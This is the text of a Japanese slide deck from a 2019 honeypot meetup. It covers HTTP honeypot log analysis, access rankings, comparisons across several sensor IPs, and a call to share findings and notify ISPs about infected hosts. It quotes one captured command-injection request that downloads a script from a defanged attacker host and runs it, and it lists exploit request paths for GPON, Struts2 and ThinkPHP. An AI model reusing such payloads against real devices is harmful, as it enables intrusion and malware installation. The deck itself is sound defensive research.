ハニーポッター流 社会貢献 第6回 ハニーポッター技術交流会 2019/03/09(Sat) S-Owl

アジェンダ  Whoami  with honeypot  ログ分析  ハニーポットの設置点による違い  観測結果の活用

Whoami

whomai S-Owl ( @Sec_S_Owl ) ・職業：元PSOCのアナリスト、ログ分析をしていました。 今は不審メールの調査とマルウェアの解析が中心。 ・http専門のハニーポッター（2018/6/5~ 1年未満） 毎日簡単に分析してログをblogに残してます ブログ： https://sec-owl.hatenablog.com/

我が家のハニーポット  スペック  ソフトウェア：WOWHoneypot / 対象ポート：80/tcp  ドメイン：取得済、未公開 / 設置IP：日本のIP  運用：2018/6/5から開始 今年のアクセス数推移

アクセスランキング 順位 種別 件数 1 phpのWebShell設置の調査 8171 2 Tomcat管理ページのブルートフォース攻撃 6019 3 phpMyAdminの調査 3821 4 通常アクセス 839 5 GPONルータの脆弱性(CVE-2018-10561)を 突くMirai亜種の攻撃 339 6 Apache Struts2の脆弱性を突く攻撃 231 7 PHPWetherMapの調査 81 8 Apache Struts2の脆弱性を突く攻撃 53 9 WordPressの調査 51 10 IISの脆弱性(CVE-2017-7269)を突く攻撃 47 11 WebDAVの調査 46 12 クローリング 46 13 不正中継の調査 38 14 Gitの調査 29 その他含む全アクセス数 : 20035 1月のアクセスランキング 2月のアクセスランキング 順位 種別 件数 1 phpのWebShell設置の調査 5022 2 phpMyAdminの調査 1865 3 通常アクセス 856 4 Tomcat管理ページのブルートフォース攻撃 216 5 不正中継の調査 108 6 GPONルータの脆弱性(CVE-2018-10561)を 突くMirai亜種の攻撃 69 7 HordeIMPの脆弱性を狙った調査 49 8 PHPWetherMapの調査 45 9 クローリング 44 10 WordPressの調査 28 11 ThinkPHPの脆弱性を突いた攻撃 27 12 Apache Struts2の脆弱性を突く攻撃 26 13 WebDAVの調査 25 14 IISの脆弱性(CVE-2017-7269)を突く攻撃 25 その他含む全アクセス数 : 8479

ハニーポットのログ分析 参考

例：D-Linkの脆弱性を突く攻撃（再掲）  「GET /login.cgi?cli=aa aa';wget hxxp://185.62.190[.]191/r -O -> /tmp/r;sh /tmp/r’$」  Exploit-DBのサイト内をクエリ内容の一部で調査  狙っていると思われるexploitが判明し、対象の機器やCVEが分かる

例：Kubernetesの調査  同一IPから来るアクセスをまとめて調査し製品を推測  その製品のexploitを調査し、アクセス内容と同じか確認

例：Apexis IP CAMの調査  Googleでアクセスパスを直接検索  アクセスすると製品が直接判明したり。（他社提供してることも）

ログ分析の効率化  日次でバッチ処理で統計を取得し分析  一度分析したアクセスパスは分析結果を蓄積  こんなリストが1300行以上。 リスト共有可能です。 リクエスト 種別 GET /phpMyadmi/index.php phpMyAdminの調査 POST /guai.php phpのWebShell設置の調査 GET /index.action Apache Struts2の脆弱性S2-045（CVE-2017-5638） を突く攻撃 POST /gpon80Form/diag_Form?images/ GPONルータの脆弱性(CVE-2018-10561)を突く Mirai亜種の攻撃 GET /api/v1/pods Kubernetesの調査 GET /bea_wls_deployment_internal Weblogicの脆弱性(CVE-2018-3252)に対する調査行 為 POST /TP/public/index.php?s=captcha ThinkPHPの脆弱性を突いた攻撃 GET hxxp://www.minghui.org/ 不正中継の調査

気になること ハニーポットの観測の違い

ハニーポットのネットワーク依存性  #ハニーポット観察 を見ていると、同じアクセスを受けたり 受けなかったりと観測にズレるものがある。  思いますよね？  有名機関によるネットワーク定点観測  NICT / NICTERWEB （ダークウェブ観測）  警察庁 / @police （全国の警察施設に設置したセンサー）  JPCERT / TSUBAME （アジア・太平洋地域インターネット定点観測）  IIJ / ハニーポット （設置点はレポートからは不明）  これらの主にポートスキャンでも、傾向に違いがでる  観測するネットワークによって、傾向に違いがある

ハニーポットを複数設置  複数IPでハニーポットを稼働させた  使い慣れたWOWHoneypotを使用 （全ポート見た方が傾向の違いがよく出るだろうと思うので、 そのうちHoneyTrap等に変えたい…）  対象は以下の4サーバ 種別 事業者 IP 稼働日 備考 メイン IDCF 210.140.82.xxx 2018/06/05 ドメインあり IDCF 210.152.87.xxx 2019/02/28 ABLE 150.66.13.xxx 2019/02/27 特殊 KAGOYA 133.18.169.xxx 2019/02/25 ドメインあり ルールなし

観測結果（アクセス数） 0 100 200 300 400 500 600 700 800 900 1時 20時 2時 8時 14時 21時 1時 13時 19時 23時 5時 11時 15時 23時 5時 12時 17時 21時 2時 7時 14時 18時 22時 2時 7時 12時 18時 0時 4時 8時 12時 16時 20時 0時 7時 11時 17時 21時 3時 9時 15時 19時 23時 3時 7時 11時 15時 19時 23時 2月 25 日 2月26日 2月27日 2月28日 3月1日 3月2日 3月3日 3月4日 3月5日 3月6日 3月7日 210.140.82.xxx 210.152.87.xxx 150.66.13.xxx 133.18.169.xxx 観測量が増加するタイミングが一致する時もある

観測結果（アクセス種別）  追加で50以上の新しいアクセスを観測  同種のアクセスでもIPによりアクセス量が異なる  ドメインのあるIPには特にWordPressのアクセスが多い  IPをベースにパス名を決めるようなアクセスはIPが多い方が分かる 0 200 400 600 800 1000 1200 133.18.169.xxx 210.140.82.xxx 133.18.169.xxx 210.140.82.xxx 133.18.169.xxx 150.66.13.xxx 210.140.82.xxx 133.18.169.xxx 150.66.13.xxx 210.140.82.xxx 210.152.87.xxx 133.18.169.xxx 150.66.13.xxx 210.140.82.xxx 210.152.87.xxx 133.18.169.xxx 150.66.13.xxx 210.140.82.xxx 210.152.87.xxx 133.18.169.xxx 150.66.13.xxx 210.140.82.xxx 210.152.87.xxx 133.18.169.xxx 150.66.13.xxx 210.140.82.xxx 210.152.87.xxx 133.18.169.xxx 150.66.13.xxx 210.140.82.xxx 210.152.87.xxx 133.18.169.xxx 150.66.13.xxx 210.140.82.xxx 210.152.87.xxx 133.18.169.xxx 150.66.13.xxx 210.140.82.xxx 210.152.87.xxx 2月 25日 2月 26日 2月27日 2月28日 3月1日 3月2日 3月3日 3月4日 3月5日 3月6日 3月7日 phpのWebShell設置 の調査 phpMyAdminの調査 Tomcat管理ページ へのブルート フォース攻撃 WordPressの調査 Apache Struts2の脆 弱性を突く攻撃 ThinkPHPの脆弱性 を突いた攻撃

観測結果（アクセス種別）  IoT編  同種のアクセスでもIPによりアクセス量が異なる  数が少なくて誤差の範囲、かも 0 1 2 3 4 5 6 7 8 9 10 133.18.169.xxx 210.140.82.xxx 133.18.169.xxx 210.140.82.xxx 133.18.169.xxx 150.66.13.xxx 210.140.82.xxx 133.18.169.xxx 150.66.13.xxx 210.140.82.xxx 210.152.87.xxx 133.18.169.xxx 150.66.13.xxx 210.140.82.xxx 210.152.87.xxx 133.18.169.xxx 150.66.13.xxx 210.140.82.xxx 210.152.87.xxx 133.18.169.xxx 150.66.13.xxx 210.140.82.xxx 210.152.87.xxx 133.18.169.xxx 150.66.13.xxx 210.140.82.xxx 210.152.87.xxx 133.18.169.xxx 150.66.13.xxx 210.140.82.xxx 210.152.87.xxx 133.18.169.xxx 150.66.13.xxx 210.140.82.xxx 210.152.87.xxx 133.18.169.xxx 150.66.13.xxx 210.140.82.xxx 210.152.87.xxx 2月 25日 2月 26日 2月27 日 2月28日 3月1日 3月2日 3月3日 3月4日 3月5日 3月6日 3月7日 GPONルータの脆弱性 (CVE-2018-10561)を 突くMirai亜種の攻撃 D-Linkルータの脆弱 性(CVE-2015-2051)の 調査 Linksysの脆弱性を狙 うMirai亜種 D-Linkの脆弱性を狙 うMirai亜種 NUUO NVRの脆弱性 (CVE-2018-15716)の 調査

観測結果の活用 してますか？

観測結果の活用  ハニーポットを運用する目的は、なんですか？  スキャン活動の監視  マルウェア検体の入手  攻撃手法の収集 etc…  何かに活用してますか？  こういった活用はどうでしょうか、という一つの提案です

その１：情報共有  ハニーポッターなら、よその様子、気になります  #ハニーポット観察でアウトプット  観測点により検知傾向が違うため、検知したものを共有して欲しい  自分もほぼ毎日blog更新予定  うちのblogのアクセスは大半がgoogle検索によるもの  アクセスパスを載せることで、同じようなアクセスを受けた人が探す際に ヒットすると思われる  情報共有、してもらえませんか？  構築やツール等のblogも助かります  ハンティングルールも共有して欲しいな

その１：情報共有  情報発信していると、預かり知らぬところで活用されることも インターネット定点観測レポート(2018年 10～12月) https://www.jpcert.or.jp/tsubame/report/report201810-12.html

その２：日本のアクセスの調査  日本からのアクセスを抽出 日付 パス 国 都市 送信元IP AS 01-30 /GponForm/diag_Form?style/ JP 横浜 180.46.119.xxx AS4713: OCN NTT Communications Corporation, JP 01-25 /GponForm/diag_Form?style/ JP 横浜 180.46.119.xxx 01-04 /GponForm/diag_Form?style/ JP 180.15.94.xxx 01-16 /GponForm/diag_Form?style/ JP 東京 153.201.255.xxx 01-10 /GponForm/diag_Form?style/ JP 横浜 153.203.117.xxx 01-04 /GponForm/diag_Form?style/ JP 東京 153.167.52.xxx 01-26 /GponForm/diag_Form?style/ JP 大阪 125.192.167.xxx AS2518: BIGLOBE BIGLOBE Inc., JP 01-25 /GponForm/diag_Form?style/ JP 大阪 125.192.167.xxx 01-18 /GponForm/diag_Form?images/ JP 東京 119.175.232.xxx AS9824: JTCL-JP-AS Jupiter Telecommunication Co. Ltd, JP 01-03 /GponForm/diag_Form?style/ JP 東京 27.141.162.xxx 01-03 /GponForm/diag_Form?style/ JP 60.62.222.xxx 01-03 /GponForm/diag_Form?style/ JP 60.62.222.xxx 01-04 /GponForm/diag_Form?style/ JP 大阪 60.56.134.xxx AS17511: K-OPTICOM K- Opticom Corporation, JP 01-03 /GponForm/diag_Form?style/ JP 京都 121.82.133.xxx 01-04 /GponForm/diag_Form?style/ JP 佐世保 203.135.246.xxx AS7679: QTNET Kyushu Telecommunication 01-03 /GponForm/diag_Form?style/ JP 福岡 116.94.49.xxx

その２：分析  日本からのアクセスを抽出  GPONの脆弱性を突かれて、他のIPにスキャンをかけているのでは？  該当IPをshodanで調べると、うち1つがQNAP NASと判明  QNAP と言えば、VPNFillterマルウェアで踏み台になっている可能性 CN=QNAP NAS/[email protected]

その２：NOTICE  日本からのアクセスを抽出  GPONの脆弱性を突かれて、他のIPにスキャンをかけているのでは？  該当IPをshodanで調べると、うち1つがQNAP NASと判明  QNAP と言えば、VPNFillterマルウェアで踏み台になっている可能性  マルウェア感染が疑われる場合、通知しよう  各ISPでは迷惑行為等の調査受付をするabuse窓口がある  そこに通知することで、対処される、可能性がある  脆弱性を突かれた機器を観測できれば自分たちで対応できる  NOTICEを待たずとも日本のセキュリティのために動ける

まとめ  ハニーポットは設置場所に見えるものが違う  複数植えるのも楽しい  ハニーポットの観測結果は是非情報共有して下さい！  #ハニーポット観察  ハニーポッターだから取れるアクションもある  日本のセキュリティをもっと良くしていきたい

FIN